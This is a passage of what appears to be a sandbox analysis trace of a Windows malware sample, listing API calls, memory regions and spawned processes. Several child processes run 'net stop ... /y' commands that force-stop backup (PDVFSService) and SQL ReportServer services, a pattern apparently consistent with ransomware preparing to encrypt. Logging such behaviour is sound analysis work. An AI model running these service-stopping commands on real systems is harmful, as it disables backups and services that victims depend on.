(_String1="lanmanserver", _String2="PDVFSService") returned -4 [0107.794] _wcsicmp (_String1="alerter", _String2="PDVFSService") returned -15 [0107.794] _wcsicmp (_String1="netlogon", _String2="PDVFSService") returned -2 [0107.794] _wcsupr (in: _String="PDVFSService" | out: _String="PDVFSSERVICE") returned="PDVFSSERVICE" [0107.794] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xfce10 [0107.838] GetServiceKeyNameW (in: hSCManager=0xfce10, lpDisplayName="PDVFSSERVICE", lpServiceName=0xff1a5750, lpcchBuffer=0x28fb68 | out: lpServiceName="", lpcchBuffer=0x28fb68) returned 0 [0107.839] _wcsicmp (_String1="msg", _String2="PDVFSSERVICE") returned -3 [0107.839] _wcsicmp (_String1="messenger", _String2="PDVFSSERVICE") returned -3 [0107.839] _wcsicmp (_String1="receiver", _String2="PDVFSSERVICE") returned 2 [0107.839] _wcsicmp (_String1="rcv", _String2="PDVFSSERVICE") returned 2 [0107.839] _wcsicmp (_String1="redirector", _String2="PDVFSSERVICE") returned 2 [0107.839] _wcsicmp (_String1="redir", _String2="PDVFSSERVICE") returned 2 [0107.839] _wcsicmp (_String1="rdr", _String2="PDVFSSERVICE") returned 2 [0107.839] _wcsicmp (_String1="workstation", _String2="PDVFSSERVICE") returned 7 [0107.839] _wcsicmp (_String1="work", _String2="PDVFSSERVICE") returned 7 [0107.839] _wcsicmp (_String1="wksta", _String2="PDVFSSERVICE") returned 7 [0107.839] _wcsicmp (_String1="prdr", _String2="PDVFSSERVICE") returned 14 [0107.840] _wcsicmp (_String1="devrdr", _String2="PDVFSSERVICE") returned -12 [0107.840] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSSERVICE") returned -4 [0107.840] _wcsicmp (_String1="server", _String2="PDVFSSERVICE") returned 3 [0107.840] _wcsicmp (_String1="svr", _String2="PDVFSSERVICE") returned 3 [0107.840] _wcsicmp (_String1="srv", _String2="PDVFSSERVICE") returned 3 [0107.840] _wcsicmp (_String1="lanmanserver", _String2="PDVFSSERVICE") returned -4 [0107.840] _wcsicmp (_String1="alerter", _String2="PDVFSSERVICE") returned -15 [0107.840] _wcsicmp (_String1="netlogon", _String2="PDVFSSERVICE") returned -2 [0107.840] NetServiceControl (in: servername=0x0, service="PDVFSSERVICE", opcode=0x0, arg=0x0, bufptr=0x28fb70 | out: bufptr=0x28fb70) returned 0x889 [0107.840] wcscpy_s (in: _Destination=0xff1a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.840] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0107.841] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1a5b50, nSize=0x800, Arguments=0xff1a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.842] GetFileType (hFile=0xb) returned 0x2 [0107.842] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa38 | out: lpMode=0x28fa38) returned 1 [0107.843] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fa30, lpReserved=0x0 | out: lpBuffer=0xff1a5b50*, lpNumberOfCharsWritten=0x28fa30*=0x1e) returned 1 [0107.843] GetFileType (hFile=0xb) returned 0x2 [0107.843] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa38 | out: lpMode=0x28fa38) returned 1 [0107.843] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff181efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fa30, lpReserved=0x0 | out: lpBuffer=0xff181efc*, lpNumberOfCharsWritten=0x28fa30*=0x2) returned 1 [0107.843] _ultow (in: _Dest=0x889, _Radix=2685600 | out: _Dest=0x889) returned="2185" [0107.843] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1a5b50, nSize=0x800, Arguments=0xff1a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.844] GetFileType (hFile=0xb) returned 0x2 [0107.844] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa38 | out: lpMode=0x28fa38) returned 1 [0107.844] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fa30, lpReserved=0x0 | out: lpBuffer=0xff1a5b50*, lpNumberOfCharsWritten=0x28fa30*=0x34) returned 1 [0107.844] GetFileType (hFile=0xb) returned 0x2 [0107.844] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa38 | out: lpMode=0x28fa38) returned 1 [0107.845] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff181efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fa30, lpReserved=0x0 | out: lpBuffer=0xff181efc*, lpNumberOfCharsWritten=0x28fa30*=0x2) returned 1 [0107.845] NetApiBufferFree (Buffer=0xf4d50) returned 0x0 [0107.845] NetApiBufferFree (Buffer=0xfc100) returned 0x0 [0107.845] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0107.845] exit (_Code=2) Process: id = "236" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5f863000" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9086 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9087 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9088 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9089 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 9090 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9091 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9092 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9093 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9094 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9095 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9096 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 9097 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9098 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 9099 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9100 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 703 os_tid = 0xe98 Process: id = "237" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5d683000" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ReportServer$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9102 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9103 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9104 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9105 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 9106 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9107 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9108 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9109 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9110 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9111 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9112 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 9113 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9114 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9115 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9116 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 705 os_tid = 0xd1c Process: id = "238" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5eda3000" os_pid = "0x1290" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ReportServer$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9117 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9118 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9119 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9120 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9121 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9122 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9123 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9124 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9125 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9126 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9127 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9128 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9129 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 9130 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9131 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 707 os_tid = 0x1360 Process: id = "239" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x530c2000" os_pid = "0x1264" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ReportServer$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9152 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9153 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9154 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9155 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9156 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9157 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9158 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9159 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9160 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9161 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9162 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 9163 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9164 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9165 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9166 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 709 os_tid = 0x11c8 Process: id = "240" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6a093000" os_pid = "0x11b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0xc88" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9167 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9168 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9169 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9170 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 9171 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9172 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9173 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9174 start_va = 0xff5c0000 end_va = 0xff5f2fff entry_point = 0xff5c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9175 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9176 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9177 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 9178 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9179 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9180 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9181 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9182 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9183 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9184 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9185 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 9186 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 9187 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9188 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9189 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9190 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9191 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9192 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9193 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9194 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9195 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9196 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9197 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9198 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9199 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9200 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9201 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9202 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9203 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9204 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9273 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 711 os_tid = 0xca0 [0108.158] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbb0 | out: lpSystemTimeAsFileTime=0x18fbb0*(dwLowDateTime=0xf59ede10, dwHighDateTime=0x1d48689)) [0108.158] GetCurrentProcessId () returned 0x11b8 [0108.158] GetCurrentThreadId () returned 0xca0 [0108.158] GetTickCount () returned 0x24c4b [0108.158] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbb8 | out: lpPerformanceCount=0x18fbb8*=1815507600000) returned 1 [0108.160] GetModuleHandleW (lpModuleName=0x0) returned 0xff5c0000 [0108.160] __set_app_type (_Type=0x1) [0108.160] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5d9c9c) returned 0x0 [0108.160] __getmainargs (in: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788, _DoWildCard=0, _StartInfo=0xff5e479c | out: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788) returned 0 [0108.160] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.160] GetConsoleOutputCP () returned 0x1b5 [0108.252] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff5ecec0 | out: lpCPInfo=0xff5ecec0) returned 1 [0108.252] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.254] sprintf_s (in: _DstBuf=0x18fb58, 